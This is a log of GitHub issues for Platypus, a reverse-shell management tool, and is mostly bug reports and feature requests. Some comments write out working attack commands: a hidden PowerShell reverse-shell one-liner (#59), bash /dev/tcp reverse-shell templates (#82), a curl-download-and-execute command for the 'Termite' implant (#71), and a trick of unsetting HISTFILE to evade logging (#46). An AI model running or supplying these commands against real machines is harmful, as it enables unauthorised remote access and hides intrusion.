Windows 平台由于一些兼容性问题暂时没有 Termite 的客户端，预计在后续的几个版本中会添加对 Windows 的支持。

[2021-05-17 00:09] WangYihang opened #44 "Server creating wizard"
1. Select termite server
2. Select the target platform
3. Manage trojans
4. Select a trojan when `Upgrading`

[2021-05-17 04:40] WangYihang opened #45 "Support `lrzsz`"

[2021-05-17 14:23] RAF-87 opened #46 "Commands from Platypus are logged in history"
[code]
Would it be possible to run `unset HISTFILE` before doing all the above?

[2021-05-17 16:10] WangYihang commented on #46
Good idea! I will test it soon. Thanks for reporting!

[2021-05-18 03:20] WangYihang commented on #46
It works for me.
Please check it out, inform me if any unexpected behavior occurs, thank you!

[code]

[2021-05-18 07:05] WangYihang opened #47 "Detect incompatibility of `config.yml`"

[2021-05-18 07:05] WangYihang opened #48 "Automatically sync config file"

[2021-05-18 08:44] RAF-87 commented on #46
It works for me too!

I was thinking, this way we remove the ability of using history with arrow up. Which is a nice thing to have if you don't need to hide yourself.

Perhaps we could make it optional in the config.yml? Something like `history: false` and leave it false as default?

[2021-05-18 09:14] RAF-87 commented on #46
Seems to be inconsistent between distributions, normally you would get bash commands stored in memory until written to history file. But in this case seems to just disable them completely (which is not bad).
I would leave it personally as you done and just allow it on the config as I said above.
Let me know what you think.

[2021-05-18 09:40] RAF-87 commented on #46
Something going wrong. Connection gets terminated.. I don't think is related to HISTFILE change.

[code]

[2021-05-18 14:06] WangYihang opened #49 "Connection gets terminated"
Something going wrong. Connection gets terminated.. I don't think is related to HISTFILE change.

[code]

_Originally posted by @RAF-87 in https://github.com/WangYihang/Platypus/issues/46#issuecomment-843020086_

[2021-05-18 15:16] WangYihang commented on #46
I can not reproduce your situation, please provide more detail, eg:

* Platypus version
* Victim os version
* Victim kernel version
* Victim Linux distribution
* The sequence of operations that you performed on the victim

As I mentioned in issue #38, for stability, I highly recommend you to use Web UI to `Upgrade` the plain session to the encrypted session named `Termite`.

[2021-05-18 15:18] WangYihang commented on #49
@RAF-87

I can not reproduce your situation, please provide more detail, eg:

* Platypus version
* Victim os version
* Victim kernel version
* Victim Linux distribution
* The sequence of operations that you performed on the victim

As I mentioned in issue #38, for stability, I highly recommend you to use Web UI to `Upgrade` the plain session to the encrypted session named `Termite`.
Check the GIF

[2021-05-18 15:22] WangYihang commented on #46
Good idea!

[2021-05-18 15:30] WangYihang opened #50 "`DisableHistory` as a config entry of servers."
Good idea!

_Originally posted by @WangYihang in https://github.com/WangYihang/Platypus/issues/46#issuecomment-843266355_

[2021-05-18 15:51] WangYihang commented on #50
@RAF-87, Solved.

[code]

[2021-05-18 15:52] WangYihang commented on #46
Solved in #50.

[2021-05-18 15:52] #46 closed

[2021-05-18 15:53] WangYihang opened #51 "Support running under Docker"

[2021-05-19 02:23] WangYihang commented on #47
Solved via:
* https://github.com/WangYihang/Platypus/commit/f79faa0f003e79b0f54bbd41bbc6c8ffc82191d3
* https://github.com/WangYihang/Platypus/commit/41899b633b9244abd79ad42d32d2d618d62af8cd

By appending the version as a suffix of config filename, eg: `config-v1.4.1.yml`, there are no incompatibility issues.

[2021-05-19 02:23] #47 closed

[2021-05-19 02:23] #50 closed

[2021-05-27 06:18] WangYihang opened #53 "Reload config file"

[2021-07-03 06:41] heimingdan opened #56 "docker-compose exec app tmux a -t platypus ERROR: No container found for app_1"
docker-compose exec app tmux a -t platypus
ERROR: No container found for app_1

[2021-07-03 06:52] WangYihang commented on #56
Thanks for reporting, I will check it out soon.

[2021-07-05 02:13] WangYihang commented on #56
Solved. To pick up this hotfix, please use `git pull` or `git clone https://github.com/WangYihang/Platypus`.

[2021-07-05 09:07] adebroise opened #57 "WebUI Unable to connect to firewalled client's"
WebUI uses web socket to connect to client machines, however if behind a firewall you receive the following on a loop:

Reconnecting
Connection Closed

Command line version allows interactive shell as normal. Would like to be able to connect via the WebUI to the client using the same approach (ie. no port forwarding needed).

[2021-07-05 09:20] #57 closed

[2021-07-05 13:38] adebroise opened #58 "Clients remain connected on WebUI"
#### Description
[code]

#### Reproduce
1. ./Platypus_linux_amd64
2. curl http://127.0.0.1:3333|sh (on client)
3. kill -9 <process_id> (on client)
4. Refresh WebUI

#### Expected behavior
After a period of time, the connection should be dropped from the WebUI

#### Current behavior
Client remains available within WebUI until Platypus is closed. Refreshing WebUI persists the connection however won'

[2021-07-05 14:49] WangYihang commented on #58
Thanks for reporting, I will check it out soon.

[2021-07-06 00:56] WangYihang commented on #57
It seems a good idea, maybe we need more sophisticated tunneling methods (eg: UDP, TCP-over-DNS, TCP-over-ICMP).
I will add this to the TODO list. Thanks!

[2021-07-06 06:37] adebroise opened #59 "No echo on Windows reverse shell with WebUI"
#### Description
[code]

#### Reproduce
1. ./Platypus_linux_amd64
2. Execute Remote Shell on Windows client
3. Launch shell in WebUI
4. Type dir and hit enter (no echo)
5. Refresh (see echo'd dir listing)

#### Expected behavior
Realtime echo of client as is seen in the main application

#### Current behavior
No echo unless browser is refreshed

#### Screenshots/Terminal log
N/A

#### Environments

[2021-07-06 13:45] WangYihang commented on #59
Thanks for reporting, the windows platform is not currently supported. Because implement the interactive shell on the Windows platypus is much harder than the Linux platform.
But I will add this issue to the TODO list, thanks again.

[2021-07-06 13:49] adebroise commented on #59
Hi @WangYihang

Just for clarification, Platypus running on Linux Debian in a terminal window connects to an interactive shell on a Windows client with no issues, the issue relates purely to the WebUI.

Hope this helps.

[2021-07-06 13:53] WangYihang commented on #59
Ohhh, okay, I will check it out soon.

[2021-07-08 07:34] adebroise commented on #59
A bit of a follow up on this one, it appears to be related to how Windows handles line breaks.

If I type a command and hit enter it does nothing, but if I type a command and hit enter twice, it returns the result of the command.

This doesn't resolve the echo issue, but it does enable you to interact with the remote shell via the WebUI.

Hope this helps.

[2021-07-08 21:13] miathedev opened #60 "Docker container in non host mode wrong ip"
#### Description

When using the docker container in non host mode, the external ip is detected as the containers network ip. There should be a optional setter in the config.yml:

- external ip
- external domain name (for first time setup for example)

Example:
detected: 172.18.0.2
real: 90.X.X.X (public host ip on e.g. eth0)

#### Reproduce

docker-compose.yml
[code]
```docker-compose up -d```

#

[2021-07-09 03:02] WangYihang commented on #60
Good idea, this feature will be released soon, thank you for your advice.

[2021-07-10 10:34] WangYihang commented on #60
Now platypus will detect the public IP address via `http://ip-api.com/json/`. The idea you mentioned will be released in the next release.
Thanks a lot, bro!

[2021-07-10 10:46] WangYihang commented on #59
@adebroise  May I ask how did you create your windows reverse shell?
It would be helpful for solving this bug if you provide the command you were using to generate reverse shell. Thank you~

[2021-07-10 11:04] adebroise commented on #59
@WangYihang I use a few approaches, I have one written in C and one in C#, however the easiest way is simply using this one liner in PowerShell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -T

[2021-07-10 18:06] miathedev commented on #60
"bra" - fits better ^^

Thank you for your implementation!
Im going to test it and give feedback. Give me some days.

[2021-07-11 15:47] WangYihang commented on #28
Released in [v1.4.3](https://github.com/WangYihang/Platypus/releases/tag/v1.4.3).

[2021-07-11 15:51] WangYihang commented on #28
`Tunnel Create Pull 192.168.0.1 22 127.0.0.1 4444` is equalivalent to `ssh -L 4444:192.168.0.1:22`.

[2021-07-20 04:59] miathedev commented on #60
Works :)! Thank you a lot.

[2021-07-20 04:59] #60 closed

[2021-07-27 09:08] lintstar opened #62 "从 PTY Shell 使用 exit 退出后的 BUG"
**您好：**

当我获取到了一个会话并通过 Jump -> PTY -> Interact 进入一个交互式 Shell

接着使用 exit 命令退出时

会出现显示 BUG 并且丢失会话

**公网 VPS 测试：**

![image](https://user-images.githubusercontent.com/71202919/127127306-2f9cb7f7-e668-41bc-9596-eb335288a186.png)

![image](https://user-images.githubusercontent.com/71202919/127127307-83f6f9b1-f6f6-472c-9ed6-eb994898f688.png)

并且会陷入未响应状态 无法退出

![image](https://user-images.githubuserconte

[2021-07-28 03:52] mr-m0nst3r opened #63 "can't run/build the source code"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
[code]
lib\util\compiler\compiler.go:15:2: no required module provides package github.com/WangYihang/Platypus/lib/util/resource; to add it:
        go get github.com/WangYihang/Platypus/lib/util/resource
[code]
go get: module github.com/WangYihang/Platypus/lib/util/resource: reading https://goproxy.cn/github.com/%21wang%21yihang/%21pl

[2021-07-28 06:04] WangYihang commented on #63
[code]

[2021-07-28 06:07] WangYihang commented on #63
The frontend of Platypus uses some features of NodeJS which is not supported on the Windows platform. Thus Platypus can not be compiled on the windows platform.
Fortunately, Golang supports cross-compiling, we can compile Platypus on the Linux platform using the commands listed above.

[2021-07-28 06:09] WangYihang commented on #62
I will check it out soon. Thanks for reporting.

[2021-07-28 06:13] WangYihang commented on #63
You can check this [file](https://github.com/WangYihang/Platypus/blob/master/Makefile) to understand the compiling process.

[2021-07-28 06:22] WangYihang commented on #62
Suppose:
* you did not change the default config file.
* The IP address of your VPS is `1.3.3.7`
* The hash of the victim machine is `21232f297a57a5a743894a0e4a801fc3`

The quickest solution is to upgrade the current reverse shell to the encrypted shell (so-called `Termite`).

[code]

[2021-07-28 06:27] WangYihang commented on #62
Besides, could you please provide the OS information about the platyus and the client? @lintstar

[2021-07-28 06:33] WangYihang commented on #62
The expected output would be like:
[code]

[2021-07-28 06:34] WangYihang commented on #62
I can not reproduce your situation, please provide more information. @lintstar
eg:
* Platypus version
* Platypus OS version
* Victim OS version

[2021-07-28 07:09] WangYihang commented on #63
Or you can download the release binaries [here](https://github.com/WangYihang/Platypus/releases/tag/v1.5.0) if you like.

[2021-07-28 07:30] lintstar commented on #62
Platypus version：v1.5.0
Platypus OS version：CentOS Linux release 8.0.1905 (Core)
Victim OS version：Kali GNU/Linux 2021.2

[2021-07-28 07:49] lintstar commented on #62
Another question:
How to start the web service when platypus is running on the public network?
Is it running at this address: http://vpsip:7331/  ？
It seems that I can't access it.

[2021-07-28 08:31] WangYihang commented on #62
You can modify the `config.yml` which will be generated automatically the first time you start platypus.
You need to change the `restful.host` from `127.0.0.1` to `0.0.0.0` then restart platypus.
Platypus's web UI does NOT provide any authentication methods (already in the TODO list) currently, so be careful to use it.

[2021-07-28 08:53] lintstar commented on #62
Oh,thanks!
Will the speed of using upx compression and then using the upgrade command improve?

[2021-07-28 09:10] lintstar commented on #62
When I disconnected platypus, a strange unknown session occurred：
![image](https://user-images.githubusercontent.com/71202919/127296358-43ce32a3-4584-4ac5-8d9c-e6068310a815.png)

![image](https://user-images.githubusercontent.com/71202919/127296377-35e04ff0-afd7-4b88-9fc4-89feb02cc5ea.png)

[2021-07-28 10:23] WangYihang commented on #62
Yeah, there is a lot of improvement to be done. I am planning to design a `Termite` management subsystem that is able to cache the previous compiled `Termite` binaries. It will be released a few months later.

[2021-07-28 10:26] WangYihang commented on #62
By the way, could please provide your instant messaging account (eg: WeChat) so that I can keep in close touch with you?
Or email me <wangyihanger[AT]gmail.com>.
Thank you so much for reporting this issue.

[2021-07-29 03:26] WangYihang commented on #63
Run Platypus from Source on the Windows platform:
[code]

WebUI will be unavailable through this method.

[2021-08-12 00:10] KuroChu opened #64 "Makefile don't install nvm correctly"
#### Description
When I try to run the [Makefile](https://github.com/WangYihang/Platypus/blob/d13e22fc8490affa56a6bbb846546a4aee33c3e4/Makefile) it seems like it installs nvm (line 9) but at 'sudo nvm install --lts'(line 10) it gives me an error that nvm does not exist.

#### Reproduce
1. `cd Platypus`
2. `make`
...

#### Expected behavior
Should run and install without an error i think

#### Curr

[2021-08-12 03:21] WangYihang commented on #64
Thanks for reporting, I am working on it.

[2021-08-12 03:45] WangYihang commented on #64
Solved. Please check it out. @KuroChu
[code]

[2021-08-16 09:54] WangYihang opened #69 "Crash when access `/api/server`"
#### Description
[code]

#### Reproduce

1. `go run platypus.go`
2. `curl http://1.3.3.7/api/server`

#### Expected behavior

return servers information

#### Current behavior

platypus got crash.

#### Screenshots/Terminal log

[code]

![DNN6@Y13B$HHQ6Z%BCPU9YF](https://user-images.githubusercontent.com/16917636/129545570-0c455bfb-d97a-4405-abf1-948ff199aa1c.png)

#### Environments
 - OS: Ubuntu

[2021-08-16 09:54] WangYihang commented on #69
Reported by @rama291041610

[2021-08-18 01:30] Nixiabing opened #70 "mac启动失败"
#### Description
[code]

#### Reproduce
./Platypus_darwin_amd64
[1]    68619 killed     ./Platypus_darwin_amd64
...

#### Expected behavior

#### Current behavior

#### Screenshots/Terminal log

#### Environments
 - OS: mac bigsur
 - Version: 11.5.1

[2021-08-18 06:53] WangYihang commented on #70
感谢反馈，请问您的 Mac 是否使用了 M1 芯片呢？

[2021-08-18 06:58] WangYihang commented on #70
如果是的话，那这个错误是正常的，因为您在 M1 芯片上运行了 amd64 的二进制。
目前 Release（v1.5.0）并没有提供 M1 芯片的版本，如果需要可以自行编译。

[code]

[2021-08-19 00:59] Nixiabing commented on #70
哦，不好意思忘了说，我的mac还是amd的
没有M1芯片

[2021-08-19 01:00] Nixiabing commented on #70
<img width="586" alt="iShot2021-08-19 09 00 23" src="https://user-images.githubusercontent.com/20591728/129991137-6172f8ae-0dca-457e-ab96-f9395aba1266.png">

[2021-08-19 01:49] WangYihang commented on #70
欸...那确实很奇怪，您有没有尝试过从源码编译运行呢？（因为我这边没有 Mac 的设备没有办法复现 T_T

[2021-08-19 02:05] WangYihang commented on #70
或者可以先尝试部署在 Linux 的云上（下一个版本会加上 Web 界面的认证）。

[2021-08-19 02:30] Nixiabing commented on #70
linux虚拟机使用没有问题，
mac下编译好像也不太行。

[2021-08-19 03:49] WangYihang commented on #70
哦哦哦，那感觉确实很奇怪，如果您方便的话，是否可以提供 Mac 下编译的输出日志呢？（可以通过 [PasteBin](https://pastebin.ubuntu.com/) 发上来）

[2021-08-19 08:40] Nixiabing commented on #70
go: downloading github.com/go-playground/locales v0.13.0
go: downloading github.com/go-stack/stack v1.8.0
internal/util/compiler/compiler.go:14:2: no required module provides package github.com/WangYihang/Platypus/internal/util/assets; to add it:
	go get github.com/WangYihang/Platypus/internal/util/assets

[2021-08-19 08:56] WangYihang commented on #70
可以提供一下您的 Golang 版本吗？

[2021-08-19 10:59] Nixiabing commented on #70
go version go1.16.6 darwin/amd64

[2021-08-20 01:30] WangYihang commented on #70
另外您编译的时候是按照[本文](https://platypus-reverse-shell.vercel.app/%E5%86%85%E9%83%A8%E6%9C%BA%E5%88%B6/build/)进行编译的吗？

[2021-08-20 10:55] G0ne opened #71 "ROT13 big issue"
#### Description
[code]
The tool has a big issue with ROT13 encoding while gathering info from the target, which prevents from identifying the system and so the use of the core upload/ download functions. Can you please take a look into it? It just blocks the core functions.

#### Reproduce
1. any tool using ROT13 to decode the incoming commands and to encode the output of the commands
2. socat to

[2021-08-20 12:23] WangYihang commented on #71
Thanks for reporting! I will check it out soon.

[2021-08-20 12:26] G0ne commented on #71
I tried a simple TLS connection too and there is here too:

![image](https://user-images.githubusercontent.com/87523421/130232935-27ff06ec-0f0b-4e9c-8ee3-11063b23f853.png)

[2021-08-20 12:34] G0ne commented on #71
This is what, in the second test, ncat receives:
![image](https://user-images.githubusercontent.com/87523421/130233770-2fa98446-9131-42ca-8c65-a89398f93c09.png)

[2021-08-20 12:34] WangYihang commented on #71
If you want to encrypt the communication between Platypus and the victim, the better choice is to use the `Upgrade platypus_ip 13337` command (or the equivalent command to create your reverse shell is `curl -fsSL http://1.3.3.7:13339/termite/1.3.3.7:13337 -o /tmp/.H0Z9 && chmod +x /tmp/.H0Z9 && /tmp/.H0Z9`), which is more stable and fluent.

[2021-08-20 12:37] G0ne commented on #71
The software I coded to get the reverse shell already use TLS or ROT13 ( it depends on the flags ), but thanks for your info!(:

[2021-08-20 12:40] WangYihang commented on #71
Got it, I will try to reproduce the issue you mentioned soon.

[2021-08-20 12:43] G0ne commented on #71
I coded that software because initially, when you posted Platypus here did not support encryption, and the stdin/ stderr of ncat sucks a bit, so I had to get my hands dirty. Yes, you have a big fan here(;

[2021-08-20 13:28] WangYihang commented on #71
For encryption via ROT 13, I think you need the socat process running on both attacker and the victim side.

## Attacker (1.3.3.7) side

### Setup the encrypted tunnel

[code]

### Start platypus (Listening on tcp port 13337)

[code]

## Victim side

### Setup the encrypted tunnel
[code]

### Create the reverse shell

[code]

## Come back to Platypus

![image](https://user-images.githubusercontent

[2021-08-20 13:34] WangYihang commented on #71
So... It's hard to say that is a bug of platypus... I guess so?
Because the data received (which is the output of the commands executed) in platypus is rot13 encrypted which is insensible to platypus.

[2021-08-20 14:27] G0ne commented on #71
OK, I found the issue after a deep analysis.
After each input ( stdin data ) the tool I coded sleep a few seconds to hide suspicious traffic, and this causes the timeout of platypus, which then causes the OS to not get recognized, and so on...
So I have to change the code on https://github.com/WangYihang/Platypus/blob/master/internal/context/client.go ( the timeout part,  as one of suspected probl

[2021-08-20 15:09] G0ne commented on #71
What about if you let customize the timeout in the file config.yml?

[2021-08-21 02:28] Nixiabing commented on #70
我是这么编译的：
env GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w " -trimpath -o ./build/platypus/Platypus_darwin_amd64 cmd/platypus/main.go

[2021-08-21 03:14] WangYihang commented on #70
按照这个[文档](https://platypus-reverse-shell.vercel.app/%E5%86%85%E9%83%A8%E6%9C%BA%E5%88%B6/build/)编译试试。
[code]

[2021-08-21 16:16] Nixiabing commented on #70
重新在Ubuntu 20.04 环境下编译后还是有问题。。
<img width="866" alt="iShot2021-08-22 00 13 58" src="https://user-images.githubusercontent.com/20591728/130328194-29f93990-b85e-4b6c-a383-2c5d443197ee.png">

<img width="491" alt="iShot2021-08-22 00 15 59" src="https://user-images.githubusercontent.com/20591728/130328203-49f6e4f5-a7fe-4dab-898e-bf1b71296c6e.png">

[2021-08-22 03:35] WangYihang commented on #70
或者试试在 Mac 下编译呢？>_<

[2021-08-23 13:29] hy0gy commented on #28
Can you please provide an example also for push, dynamic and internet modes?
Also, to create a tunnel the upgrade command is mandatory, but what about if the established connection is already TLS?
I mean:

TLS client -> TLS server -> Platypus

There is no need in upgrading the session, and creating a tunnel is not possible.
Would be really nice so to create a tunnel even with a not upgraded sessio

[2021-08-30 07:25] hy0gy opened #72 "Timeout customization"
Would be really nice to be able to customize while executing Platypus all the relative timeouts expected once the shell from the victims arrive

[2021-08-30 14:25] WangYihang commented on #72
Great idea, this will be implemented in the next release. Thanks for your advice.

[2021-09-06 14:52] #72 closed

[2021-09-13 05:29] xinhuang commented on #69
The same issue happens to me. It occurs after the upgraded shell connects back for a while, usually 5~10 minutes. The shell is still alive though.

[2021-09-13 06:06] WangYihang commented on #69
Thanks for reporting, I am working on it. @xinhuang

[2021-09-20 02:50] TheCryingGame commented on #70
![image](https://user-images.githubusercontent.com/48227194/133952852-5105948b-a734-4875-b481-c2eb595ba73b.png)

[2021-09-20 03:27] WangYihang commented on #70
嗷，@TheCryingGame 您这个可能是因为 Mac 下没有 Ubuntu 的包管理器，以安装 go-bindata。
解决方案：
使用 HomeBrew 来[安装](https://formulae.brew.sh/formula/go-bindata) go-bindata，然后重新运行 Makefile 中剩余的命令。

[2021-09-20 04:59] TheCryingGame commented on #70
这个已经安装过的
![image](https://user-images.githubusercontent.com/48227194/133958590-2805e943-4057-4d2d-8e9f-dfaa9571d48c.png)

[2021-09-20 14:09] WangYihang commented on #70
您可能需要看一下【报错是什么意思】，然后修改一下 Makefile，我这边没有 Mac 的环境，无法复现。

[2021-09-29 03:45] hnz2010 opened #82 "bash.tpl can't work on ubuntu 18.04"
#### Description
ubuntu 18.04 bash.tpl can't work.
Describe your problem here
"/usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/127.0.0.1/13338 0>&1' >/dev/null &"  failed
"/usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/127.0.0.1/13338 0>&1' >/dev/null "  work well
"/bin/bash -c '/bin/bash -i >/dev/tcp/127.0.0.1/13338 0>&1'  "  work well ,but some stdout output.

#### Reproduce
1. ./Platyp

[2021-09-29 05:09] WangYihang commented on #82
Thanks for reporting, I will check it out soon. @hnz2010

[2021-09-29 07:24] WangYihang commented on #82
Done, now the `reverse shell as a service` will work as expected.

[2021-09-29 08:06] hnz2010 commented on #82
you MUST NOT  change /usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1' >/dev/null &

[2021-09-29 08:08] hnz2010 commented on #82
you MUST NOT change   `/usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1' >/dev/null &` to `/usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1 &' >/dev/null `  , nohup used with &.

[2021-09-29 08:09] hnz2010 commented on #82
you MUST NOT change /usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1' >/dev/null & to /usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1 &' >/dev/null , nohup used with &.

[2021-09-29 08:38] hnz2010 commented on #82
I think the endline `&` crash with `/bin/bash -i >/dev/tcp/HOST/PORT 0>&1` .

[2021-10-06 06:22] WangYihang commented on #69
Fixed (I guess 🤣 ).

### How does this bug appears

The root cause is that I misused the struct tags for the package [encoding/json](https://pkg.go.dev/encoding/json).

This problem can be solved by adding `json:"-"` after the unexported field of `TermiteClient`, see [here](https://github.com/WangYihang/Platypus/blob/2e5b74b9a06cdc530a3deb0cd751011a4d03c524/internal/context/termite.go#L59-L66).

#

[2021-10-19 08:43] WAY29 opened #84 "Use script command 头"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior

#### Current behavior

#### Screenshots/Terminal log

#### Environments
 - OS: Ubuntu 20.04
 - Version: 1.5.0

[2021-10-21 10:54] WangYihang commented on #84
Cool, thank you so much for your advice.  @WAY29
It will be released in the next version.

[2021-10-31 09:31] jarowlu opened #85 "hi boddy, target unsupported freebsd?"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior

#### Current behavior

#### Screenshots/Terminal log

#### Environments
 - OS: Ubuntu 20.04
 - Version: 1.5.0

[2021-10-31 09:42] WangYihang commented on #85
okay, I will check this out tonight. thanks for reporting.

[2021-10-31 09:45] WangYihang commented on #85
The reason is that the termite binary has not been compiled for the **FreeBSD** platform, actually, it only supports `Linux_amd64`.

I will give you a quick dirty solution tonight.

[2021-10-31 09:56] WangYihang commented on #85
1. clone this repo into an fresh ubuntu 20.04 system.
2. modify file: [cmd/termite/main.go#L789](https://github.com/WangYihang/Platypus/blob/master/cmd/termite/main.go#L789), change `service` to your platypus ip address.
3. run `make install_dependency` to install dependencies
3. run `make release`
4. run `env GOOS=freebsd GOARCH=amd64 go build -ldflags="-s -w " -trimpath -o ./build/termite/termit

[2021-10-31 09:57] jarowlu commented on #85
okay，i stay with your report，thanks !

[2021-10-31 09:57] jarowlu commented on #85
ok let me try it

[2021-10-31 12:18] WangYihang commented on #85
Inform me if you succeed! Good luck! @jarowlu

[2021-10-31 15:28] jarowlu commented on #85
hi bro, my freebsd has not /bin/bash ,only have /bin/sh  ,so unsupport on my os.

node-sass fixed version compiled erro, cancel fixed version is success.

[2021-10-31 15:31] jarowlu commented on #85
"/bin/bash" change to "/bin/sh" is success

[2021-11-03 07:09] ywledoc opened #86 "使用页面进行upgrade操作时，无法准确升级所选主机"
#### Description
[code]

[2021-11-03 08:04] WangYihang commented on #86
@ywledoc  感谢反馈，我研究一下，应该是前端的问题。

临时解决方案：
* 使用命令行来 Upgrade
* 在最开始弹 Shell 的时候，就直接使用 Termite 相关的一键上线命令，如下：

[code]

[2021-11-11 13:06] Gofreedom0 opened #87 "Web界面未鉴权问题"
[code]

[2021-11-11 13:25] WangYihang commented on #87
dev 分支已经有认证了，但是由于改动较多，还没发 release。

提供给你几个临时解决方案：
1. 只使用 cli
2. 前面挂一个反向代理（如：nginx），加上 basic 认证

[2021-11-22 08:54] zer0yu commented on #70
存在无法启动问题+1

[2021-11-22 09:03] WangYihang commented on #70
T_T 感谢反馈，我这没有 Mac 环境，暂时无法复现。如果您那边可以手动编译的话，可以麻烦您贴一下编译的报错或者运行的报错吗？

[2021-12-18 14:38] mayongze opened #89 "在交互shell场景下tail -f 无法退出"
#### Description
[code]
在交互shell场景下tail -f 无法退出

#### Reproduce
1. `interact`
2. `tail -f <file>`
3. `ctrl+C 无法终止tail -f输出`

#### Expected behavior
终止tail -f输出

#### Current behavior
不会退出, 在web shell中也无法推出

#### Screenshots/Terminal log

#### Environments
 - OS: Ubuntu 20.04
 - Version: 1.5.0

[2021-12-19 03:43] WangYihang commented on #89
好的，感谢反馈，我待会儿看一下。

[2021-12-19 04:37] WangYihang commented on #89
临时解决方案：
1. 通过 Upgrade 命令/按钮将当前 Session 升级到 Termite Session 之后就可以正常 CTRL C 退出 `tail -f` 了。@mayongze
2. 如果在非 Termite 的 Session 里，tail -f 执行之后无法通过 CTRL C 退出，可以先 CTRL Z 挂起前台进程组之后再 kill。

![image](https://user-images.githubusercontent.com/16917636/146664013-337dcac3-33a3-4f4c-89eb-a5d4422d1abc.png)

[2021-12-19 06:13] mayongze commented on #89
感谢 @WangYihang 解答,
但是在我这里问题依然存在( CTRL Z可以使用、CTRL C无法退出),
我是直接用的Termite oneline command去反向连接的, 应该无需Upgrade
在网页和终端均尝试过tail -f
如果还需要更为详细的其他信息请告诉我

日志版本, 为当前release下载
[code]

![image](https://user-images.githubusercontent.com/22066360/146665688-19e85cc2-bad6-4584-be0c-80449bb25598.png)

![image](https://user-images.githubusercontent.com/22066360/146665721-c775b942-930e-4ea7-804d-19c5670936bc.png)

[co

[2021-12-19 06:46] mayongze commented on #89
我又在 `CentOS Linux release 7.9.2009 (Core)` 系统上进行了测试, `tailf -f` 可以正常退出
`Ubuntu 18.04.5 LTS` 不能退出

[2021-12-19 07:11] WangYihang commented on #89
嘶，确实奇怪...待我抽空深入研究一下。

[2021-12-20 09:17] tin7safe commented on #87
nginx这里还有个问题那就是当反代使用https时无法访问http的api地址。能否添加个一个tls的支持。

[2021-12-20 11:53] WangYihang commented on #87
@tin7safe 感谢反馈，已加入 TODO LIST

[2021-12-20 11:53] WangYihang opened #90 "TLS Support"
nginx这里还有个问题那就是当反代使用https时无法访问http的api地址。能否添加个一个tls的支持。

_Originally posted by @tin7safe in https://github.com/WangYihang/Platypus/issues/87#issuecomment-997740371_

[2021-12-21 23:46] klarlichter opened #92 "Victim Port"
Hello, what happen if victim mashine only can using outgoing port 443 and 80 ? And did it using ssh ? What happen if intrusion detection system is enabled? They will see your service?

[2021-12-22 01:48] WangYihang commented on #92
Thank you for your good questions.

1. What happens if the victim machine only can use outgoing ports 443 and 80?

[code]

2. Did it use ssh?

[code]

3. What happens if an intrusion detection system is enabled?

[code]

4. Will it (IDS) see your service?

[code]

BTW, if you have any good ideas about Platypus/Termite, feel free to create an issue, thank you bro.

[2022-01-10 14:26] mrjesen opened #93 "[BUG] Use && instead of &"
in /internal/context/client.go:
```echo %s & ver & echo %s```

And this command will still execute when the os type is unknown.

[2022-01-10 16:24] WangYihang commented on #93
Cool, yes `&&` is better than `&`. I will merge the pull request.

Thanks a lot, bro. Feel free to leave any pieces of advice.

[2022-01-10 16:26] #93 closed

[2022-01-13 03:31] WangYihang opened #96 "Make `/bin/bash` configurable"
Maybe we should make the shell that termite executed configurable via terminal / WEB UI. ( I will add this to the TODO list)

_Originally posted by @WangYihang in https://github.com/WangYihang/Platypus/issues/95#issuecomment-1011752976_

[2022-01-13 03:45] WangYihang opened #97 "Add Port Scanner for Termite"
**Is your feature request related to a problem? Please describe.**

On some old machines, there are no static compiled useful tools like `nmap`. Maybe we can enable Termite to do something to discover the network topology and live machines.

**Describe the solution you'd like**

Migrate some port scanning tools (eg: https://github.com/anvie/port-scanner) into Termite.

**Describe alternatives you'

[2022-01-13 04:03] WangYihang opened #98 "Detect Arch / OS / Kernel Version / Bit of Clients"
**Is your feature request related to a problem? Please describe.**

The `Upgrade` command only supports the x86-64 Linux client currently, but the reverse shell client should be able to detect the target info then distribute the correct termite binary via Arch / OS / Kernel Version / Bit info.

**Describe the solution you'd like**

For *nix system:
* Arch / Kernel Version / Bit: parse `uname -a` o

[2022-01-22 15:11] websecer opened #105 "[Recovery] 2022/01/22 - 15:06:29 panic recovered"
[code]

[2022-01-22 15:12] websecer commented on #105
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 20.04.3 LTS
Release:	20.04
Codename:	focal
我是通过xshell连接，然后把web界面端口转发出来。过一段时间就无法使用web了

[2022-01-22 15:20] websecer commented on #105
刷新web提示如下
Cannot connect to API EndPoint: Error: Request failed with status code 500

[2022-01-24 14:33] websecer opened #106 "web界面无法使用"
#### Description
[code]

#### Environments
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.3 LTS
Release:        20.04
Codename:       focal

[2022-01-24 14:39] #105 closed

[2022-01-25 02:07] WangYihang commented on #106
您说的问题之前有人提过了。

目前该问题在主分支已经修复，但是由于这个改动太小了就没有发 Release。
需要麻烦师傅 clone 代码并且手动编译一下。

详见：
* https://github.com/WangYihang/Platypus/issues/69

[2022-02-03 20:33] xiaosage666 opened #107 "Ubuntu 20.04编译错误"
参照师傅的文档 如下编译：
准备一个纯净的 Ubuntu 20.04 环境，然后执行如下命令：
sudo apt update
sudo apt install -y curl make
git clone https://github.com/WangYihang/Platypus.git
cd Platypus
make install_dependency
make release
编译成功后，发行版将会位于 ./build 文件夹中

